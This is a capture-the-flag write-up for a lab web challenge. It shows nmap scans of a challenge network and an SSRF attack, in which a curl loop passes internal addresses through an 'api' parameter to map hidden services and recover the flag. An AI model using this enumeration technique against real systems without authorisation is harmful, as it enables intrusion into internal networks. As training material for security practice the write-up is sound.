Triskel 1: First contact
Category: Airport hall/web
20 points
Coronavirus affected our airport so much that our dev team developed an app to keep track of it! I mean they didn’t have much time to make it, but what could go wrong?
by Remsio
Solution
I’ve started from performing nmap scan of the network from which ping came in Discovery challenge.
root@slon:~# nmap -sP 10.45.4.0/24
Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-22 11:45 CEST
Stats: 0:00:15 elapsed; 0 hosts completed (0 up), 256 undergoing Ping Scan
Ping Scan Timing: About 7.32% done; ETC: 11:49 (0:03:10 remaining)
Stats: 0:00:25 elapsed; 0 hosts completed (0 up), 256 undergoing Ping Scan
Ping Scan Timing: About 12.21% done; ETC: 11:49 (0:03:00 remaining)
Nmap scan report for 10.45.4.38
Host is up (0.041s latency).
Nmap scan report for 10.45.4.39
Host is up (0.040s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 68.72 seconds
root@slon:~# nmap -sV 10.45.4.38 10.45.4.39
Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-22 11:47 CEST
Nmap scan report for 10.45.4.38
Host is up (0.038s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
8100/tcp open http Apache httpd 2.4.33 ((Unix))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 10.45.4.39
Host is up (0.038s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 2 IP addresses (2 hosts up) scanned in 13.33 secondsGreat, looks like an Apache httpd running on 10.45.4.38:8100, let’s check it…
Quick look around I found some interesting backend url - http://10.45.4.38:8100/api/call_api.php?api=10.0.42.100/api/.
I’ve decided to not perform anything fancy and just iterate over the urls with curl…
for i in {1..255}; do curl http://10.45.4.38:8100/api/call_api.php?api=10.0.42.${i}; echo; doneWhole output below:
Cant connect to API : 10.0.42.1
<!DOCTYPE html>
<html lang="fr" dir="ltr">
<head>
<meta charset="utf-8">
<title>Medisin</title>
<link rel="stylesheet" href="css/bootstrap.min.css"></link>
<link rel="icon" type="image/png" href="images/triskele.png" />
</head>
<body>
<nav class="navbar navbar-expand-lg navbar-dark bg-dark">
<a class="navbar-brand" href="/">
<img src="images/triskele.png" width="30" height="30" class="d-inline-block align-top" alt=""> Brittany
</a>
<div class="collapse navbar-collapse" id="navbarNav">
<ul class="navbar-nav">
<li class="nav-item">
<a class="nav-link" href="/outside_of_brittany.php">Outside of Brittany</a>
</li>
</ul>
</div>
<form class="form-inline my-2 my-lg-0" method="post" action="/">
<input class="form-control mr-sm-2" type="text" name="username" placeholder="Username">
<input class="form-control mr-sm-2" type="password" name="password" placeholder="Password">
<button class="btn btn-outline-success my-2 my-sm-0" type="submit">Se connecter</button>
</form>
</nav>
<div class="container">
<h1>Medisin</h1>
<p>Medisin is your friendly medical media to keep you in touch with Corona virus news in Brittany.</p>
<h2>01 March 2021, 15:23:38</h2>
<img src="images/bretagne.png"/>
<p>1218 new positive cases during the last 72h in Brittany.</p>
<h2>03 March 2021, 08:52:23</h2>
<img src="images/epidemie.jpeg"/>
<p>1200 new positive cases in only 48 hours in Brittany, unfortunatly it looks like we are getting closer to a new lockdown.</p>
<h2>03 March 2021, 16:04:32</h2>
<img src="images/corona_6_pack.jpg"/>
<p>To keep you in touch about the Brittany news, we use multiple APIs and sort the best information just for you!</p>
</div>
<script type="text/javascript" src="js/jquery.min.js"></script>
<script type="text/javascript" src="js/bootstrap.min.js"></script>
</body>
</html>
Cant connect to API : 10.0.42.3
Cant connect to API : 10.0.42.4
Cant connect to API : 10.0.42.5
Cant connect to API : 10.0.42.6
Cant connect to API : 10.0.42.7
Cant connect to API : 10.0.42.8
Cant connect to API : 10.0.42.9
Cant connect to API : 10.0.42.10
Cant connect to API : 10.0.42.11
Cant connect to API : 10.0.42.12
Cant connect to API : 10.0.42.13
Cant connect to API : 10.0.42.14
Cant connect to API : 10.0.42.15
Cant connect to API : 10.0.42.16
Cant connect to API : 10.0.42.17
Cant connect to API : 10.0.42.18
Cant connect to API : 10.0.42.19
Cant connect to API : 10.0.42.20
Cant connect to API : 10.0.42.21
Cant connect to API : 10.0.42.22
Cant connect to API : 10.0.42.23
Cant connect to API : 10.0.42.24
Cant connect to API : 10.0.42.25
Cant connect to API : 10.0.42.26
Cant connect to API : 10.0.42.27
Cant connect to API : 10.0.42.28
Cant connect to API : 10.0.42.29
Cant connect to API : 10.0.42.30
Cant connect to API : 10.0.42.31
Cant connect to API : 10.0.42.32
Cant connect to API : 10.0.42.33
Cant connect to API : 10.0.42.34
Cant connect to API : 10.0.42.35
Cant connect to API : 10.0.42.36
Cant connect to API : 10.0.42.37
Cant connect to API : 10.0.42.38
Cant connect to API : 10.0.42.39
Cant connect to API : 10.0.42.40
Cant connect to API : 10.0.42.41
Cant connect to API : 10.0.42.42
Cant connect to API : 10.0.42.43
Cant connect to API : 10.0.42.44
Cant connect to API : 10.0.42.45
Cant connect to API : 10.0.42.46
Cant connect to API : 10.0.42.47
Cant connect to API : 10.0.42.48
Cant connect to API : 10.0.42.49
Cant connect to API : 10.0.42.50
Cant connect to API : 10.0.42.51
Cant connect to API : 10.0.42.52
Cant connect to API : 10.0.42.53
Cant connect to API : 10.0.42.54
Cant connect to API : 10.0.42.55
Cant connect to API : 10.0.42.56
Cant connect to API : 10.0.42.57
Cant connect to API : 10.0.42.58
Cant connect to API : 10.0.42.59
Cant connect to API : 10.0.42.60
Cant connect to API : 10.0.42.61
Cant connect to API : 10.0.42.62
Cant connect to API : 10.0.42.63
Cant connect to API : 10.0.42.64
Cant connect to API : 10.0.42.65
Cant connect to API : 10.0.42.66
Cant connect to API : 10.0.42.67
Cant connect to API : 10.0.42.68
Cant connect to API : 10.0.42.69
Cant connect to API : 10.0.42.70
Cant connect to API : 10.0.42.71
Cant connect to API : 10.0.42.72
Cant connect to API : 10.0.42.73
Cant connect to API : 10.0.42.74
Cant connect to API : 10.0.42.75
Cant connect to API : 10.0.42.76
Cant connect to API : 10.0.42.77
Cant connect to API : 10.0.42.78
Cant connect to API : 10.0.42.79
Cant connect to API : 10.0.42.80
Cant connect to API : 10.0.42.81
Cant connect to API : 10.0.42.82
Cant connect to API : 10.0.42.83
Cant connect to API : 10.0.42.84
Cant connect to API : 10.0.42.85
Cant connect to API : 10.0.42.86
Cant connect to API : 10.0.42.87
Cant connect to API : 10.0.42.88
Cant connect to API : 10.0.42.89
Cant connect to API : 10.0.42.90
Cant connect to API : 10.0.42.91
Cant connect to API : 10.0.42.92
Cant connect to API : 10.0.42.93
Cant connect to API : 10.0.42.94
Cant connect to API : 10.0.42.95
Cant connect to API : 10.0.42.96
Cant connect to API : 10.0.42.97
Cant connect to API : 10.0.42.98
Cant connect to API : 10.0.42.99
<!DOCTYPE html>
<html lang="en">
<head>
<title>Working!</title>
</head>
<body>
<h1>Working!</h1>
</body>
</html>
Cant connect to API : 10.0.42.101
Cant connect to API : 10.0.42.102
Cant connect to API : 10.0.42.103
Cant connect to API : 10.0.42.104
Cant connect to API : 10.0.42.105
Cant connect to API : 10.0.42.106
Cant connect to API : 10.0.42.107
Cant connect to API : 10.0.42.108
Cant connect to API : 10.0.42.109
Cant connect to API : 10.0.42.110
Cant connect to API : 10.0.42.111
Cant connect to API : 10.0.42.112
Cant connect to API : 10.0.42.113
Cant connect to API : 10.0.42.114
Cant connect to API : 10.0.42.115
Cant connect to API : 10.0.42.116
Cant connect to API : 10.0.42.117
Cant connect to API : 10.0.42.118
Cant connect to API : 10.0.42.119
Cant connect to API : 10.0.42.120
Cant connect to API : 10.0.42.121
Cant connect to API : 10.0.42.122
Cant connect to API : 10.0.42.123
Cant connect to API : 10.0.42.124
Cant connect to API : 10.0.42.125
Cant connect to API : 10.0.42.126
Cant connect to API : 10.0.42.127
Cant connect to API : 10.0.42.128
Cant connect to API : 10.0.42.129
Cant connect to API : 10.0.42.130
Cant connect to API : 10.0.42.131
Cant connect to API : 10.0.42.132
Cant connect to API : 10.0.42.133
Cant connect to API : 10.0.42.134
Cant connect to API : 10.0.42.135
Cant connect to API : 10.0.42.136
Cant connect to API : 10.0.42.137
Cant connect to API : 10.0.42.138
Cant connect to API : 10.0.42.139
Cant connect to API : 10.0.42.140
Cant connect to API : 10.0.42.141
Cant connect to API : 10.0.42.142
Cant connect to API : 10.0.42.143
Cant connect to API : 10.0.42.144
Cant connect to API : 10.0.42.145
Cant connect to API : 10.0.42.146
Cant connect to API : 10.0.42.147
Cant connect to API : 10.0.42.148
Cant connect to API : 10.0.42.149
Cant connect to API : 10.0.42.150
Cant connect to API : 10.0.42.151
Cant connect to API : 10.0.42.152
Cant connect to API : 10.0.42.153
Cant connect to API : 10.0.42.154
Cant connect to API : 10.0.42.155
Cant connect to API : 10.0.42.156
Cant connect to API : 10.0.42.157
Cant connect to API : 10.0.42.158
Cant connect to API : 10.0.42.159
Cant connect to API : 10.0.42.160
Cant connect to API : 10.0.42.161
Cant connect to API : 10.0.42.162
Cant connect to API : 10.0.42.163
Cant connect to API : 10.0.42.164
Cant connect to API : 10.0.42.165
Cant connect to API : 10.0.42.166
Cant connect to API : 10.0.42.167
Cant connect to API : 10.0.42.168
Cant connect to API : 10.0.42.169
Cant connect to API : 10.0.42.170
Cant connect to API : 10.0.42.171
Cant connect to API : 10.0.42.172
Cant connect to API : 10.0.42.173
Cant connect to API : 10.0.42.174
Cant connect to API : 10.0.42.175
Cant connect to API : 10.0.42.176
Cant connect to API : 10.0.42.177
Cant connect to API : 10.0.42.178
Cant connect to API : 10.0.42.179
Cant connect to API : 10.0.42.180
Cant connect to API : 10.0.42.181
Cant connect to API : 10.0.42.182
Cant connect to API : 10.0.42.183
Cant connect to API : 10.0.42.184
Cant connect to API : 10.0.42.185
Cant connect to API : 10.0.42.186
Cant connect to API : 10.0.42.187
Cant connect to API : 10.0.42.188
Cant connect to API : 10.0.42.189
Cant connect to API : 10.0.42.190
Cant connect to API : 10.0.42.191
Cant connect to API : 10.0.42.192
Cant connect to API : 10.0.42.193
Cant connect to API : 10.0.42.194
Cant connect to API : 10.0.42.195
Cant connect to API : 10.0.42.196
Cant connect to API : 10.0.42.197
Cant connect to API : 10.0.42.198
Cant connect to API : 10.0.42.199
<!DOCTYPE html>
<html lang="fr" dir="ltr">
<head>
<meta charset="utf-8">
<title>Kontammadur</title>
<link rel="stylesheet" href="css/bootstrap.min.css"></link>
<link rel="icon" type="image/png" href="images/triskele.png" />
<link rel="stylesheet" href="css/style.css"></link>
</head>
<body>
<nav class="navbar navbar-expand-lg navbar-dark bg-dark">
<a class="navbar-brand" href="/">
<img src="images/triskele.png" width="30" height="30" class="d-inline-block align-top" alt=""> Kontammadur
</a>
</nav>
<div class="container">
<form action="/" method="get">
<div class="form-row align-items-center">
<label class="my-1 mr-2" for="inlineFormCustomSelectPref">Rechercher par pseudo</label>
<input type="text" name="search">
<button type="submit" class="btn btn-primary my-1">Chercher</button>
</div>
</form>
<div class="chat">
<div><img src="/images/frustrated.svg" alt="Avatar"><b>admin_richard_lauren</b></div>
<p>There are 29 corona cases in our enterprise Kontammadur!!</p>
<span class="time-left">vendredi 28 février 2020, 20:42:00</span>
</div>
<div class="chat">
<div><img src="/images/frustrated.svg" alt="Avatar"><b>admin_denis_valette</b></div>
<p>Where is it?? Is it in Vannes?</p>
<span class="time-left">lundi 2 mars 2020, 09:25:40</span>
</div>
<div class="chat">
<div><img src="/images/frustrated.svg" alt="Avatar"><b>admin_denis_valette</b></div>
<p>Yes it's in Vannes, what are you waiting for, contact quickly the head of the airport, they can't let people leave anymore!</p>
<span class="time-left">mardi 3 mars 2020, 13:10:08</span>
</div>
<div class="chat">
<div><img src="/images/frustrated.svg" alt="Avatar"><b>dev_pomeroy_dagenais</b></div>
<p>Hum guys? Did you notice that the dev_leroy_bedart is currently doing some strange stuff on our production server? I blocked him and closed the prod just in case, please don't respond to strange mails..</p>
<span class="time-left">jeudi 5 mars 2020, 12:39:12</span>
</div>
<div class="chat">
<div><img src="/images/frustrated.svg" alt="Avatar"><b>dev_pomeroy_dagenais</b></div>
<p>Oh and also I saw this on the news: NORZH{You_just_SSRFed_your_way_in!!!}, do you know what NORZH is? </p>
<span class="time-left">jeudi 5 mars 2020, 12:39:12</span>
</div>
<form action="/" method="post">
<div class="form-group">
<input type="text" class="form-control" id="" placeholder="Message">
<button type="submit" class="btn btn-primary">Envoyer</button>
</div>
</form>
</div>
<script type="text/javascript" src="js/jquery.min.js"></script>
<script type="text/javascript" src="js/bootstrap.min.js"></script>
</body>
</html>
Cant connect to API : 10.0.42.201
Cant connect to API : 10.0.42.202
Cant connect to API : 10.0.42.203
Cant connect to API : 10.0.42.204
Cant connect to API : 10.0.42.205
Cant connect to API : 10.0.42.206
Cant connect to API : 10.0.42.207
Cant connect to API : 10.0.42.208
Cant connect to API : 10.0.42.209
Cant connect to API : 10.0.42.210
Cant connect to API : 10.0.42.211
Cant connect to API : 10.0.42.212
Cant connect to API : 10.0.42.213
Cant connect to API : 10.0.42.214
Cant connect to API : 10.0.42.215
Cant connect to API : 10.0.42.216
Cant connect to API : 10.0.42.217
Cant connect to API : 10.0.42.218
Cant connect to API : 10.0.42.219
Cant connect to API : 10.0.42.220
Cant connect to API : 10.0.42.221
Cant connect to API : 10.0.42.222
Cant connect to API : 10.0.42.223
Cant connect to API : 10.0.42.224
Cant connect to API : 10.0.42.225
Cant connect to API : 10.0.42.226
Cant connect to API : 10.0.42.227
Cant connect to API : 10.0.42.228
Cant connect to API : 10.0.42.229
Cant connect to API : 10.0.42.230
Cant connect to API : 10.0.42.231
Cant connect to API : 10.0.42.232
Cant connect to API : 10.0.42.233
Cant connect to API : 10.0.42.234
Cant connect to API : 10.0.42.235
Cant connect to API : 10.0.42.236
Cant connect to API : 10.0.42.237
Cant connect to API : 10.0.42.238
Cant connect to API : 10.0.42.239
Cant connect to API : 10.0.42.240
Cant connect to API : 10.0.42.241
Cant connect to API : 10.0.42.242
Cant connect to API : 10.0.42.243
Cant connect to API : 10.0.42.244
Cant connect to API : 10.0.42.245
Cant connect to API : 10.0.42.246
Cant connect to API : 10.0.42.247
Cant connect to API : 10.0.42.248
Cant connect to API : 10.0.42.249
Cant connect to API : 10.0.42.250
Cant connect to API : 10.0.42.251
Cant connect to API : 10.0.42.252
Cant connect to API : 10.0.42.253
Cant connect to API : 10.0.42.254
Cant connect to API : 10.0.42.255Summary:
10.0.42.1- this is the service which is “visible” under10.45.4.38:810010.0.42.100- this is the api of the webpage10.0.42.200- kinda chat service, where the flag is placed ;-)
Flag
NORZH{You_just_SSRFed_your_way_in!!!}